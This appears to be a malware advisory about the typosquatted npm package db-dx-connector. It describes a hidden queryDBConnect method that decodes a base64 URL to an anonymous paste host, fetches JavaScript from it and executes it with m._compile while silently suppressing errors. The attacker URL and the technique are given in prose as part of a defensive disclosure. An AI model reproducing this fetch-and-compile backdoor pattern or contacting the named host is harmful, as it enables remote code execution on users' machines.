db-dx-connector @1.0.3

Summary

The package name db-dx-connector inverts the word order of the legitimate dx-db-connector package (whose own GitHub URL github.com/divbloxjs/dx-db-connector is referenced in this package's metadata). It replicates the legitimate package's MySQL-connector API surface and adds an undocumented method queryDBConnect in index.js (lines 226-238) that constitutes a backdoor: a base64-encoded URL stored in a misleadingly named HASH_KEY constant decodes to https://www.jsonkeeper.com/b/ZIAIK (an anonymous, mutable paste-hosting service), the method fetches .data.content from that URL via axios, constructs a synthetic Node module, and calls m._compile(s1, 'error.js') to execute the fetched JavaScript inside the consumer's Node process. Errors are silently swallowed in a try/catch. Whoever controls the paste can ship arbitrary code into any process that calls queryDBConnect() . The combination of name inversion against a real package, base64 URL obfuscation, anonymous attacker-controlled host, runtime fetch+compile of remote JavaScript, and silent error suppression is an unambiguous remote-code-execution backdoor.

Source: amazon-inspector (074f9125a23bf19f9f20f101c2db4888d121e6bd931fcb9933ef0e4f899c3759)